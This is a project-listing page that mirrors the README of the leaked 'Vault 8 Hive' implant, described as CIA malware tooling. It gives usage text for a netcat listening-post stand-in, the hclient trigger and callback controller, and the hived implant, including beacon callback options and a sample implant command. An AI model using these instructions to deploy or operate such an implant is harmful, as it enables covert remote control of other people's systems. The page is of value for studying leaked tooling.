Vault 8 Hive Save

Hive solves a critical problem for the malware operators at the CIA.

Project README

//************************************************************************* - scripted netcat listener to emulate listening post until LP is set up

Usage: ./

//************************************************************************* hclient - hive client that works with Windows, Solaris, and Linux implant

Usage: ./hclient-linux-dbg [-p port] ./hclient-linux-dbg [-p port] [-t address] [-a address] [-P protocol] [-d delay]

Depending on options, client can send triggers, listen, or both [-p port] - callback port [-t address] - IP address of target [-a address] - IP address of listener [-P protocol] - trigger protocol [-d delay] - (optional) delay between received trigger and callback [-h ] - print this usage

Examples: Coming soon!

//************************************************************************* hived - hive implant

Usage: ./hived-solaris-sparc-dbg -a -p

    -a - Beacon IP address to callback to
    -p - Beacon port
    -I - interface [required, only for Solaris, e.g. hme0, e1000g0]
    -d - Initial Beacon delay in milliseconds
    -i - Beacon interval in milliseconds
    -h - Print help

Example: ./hived-solaris-sparc-dbg -a -p 9999 -i 100000 -I hme0

Open Source Agenda is not affiliated with "Vault 8 Hive" Project. README Source: soufianetahiri/Vault-8-Hive
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6 years ago

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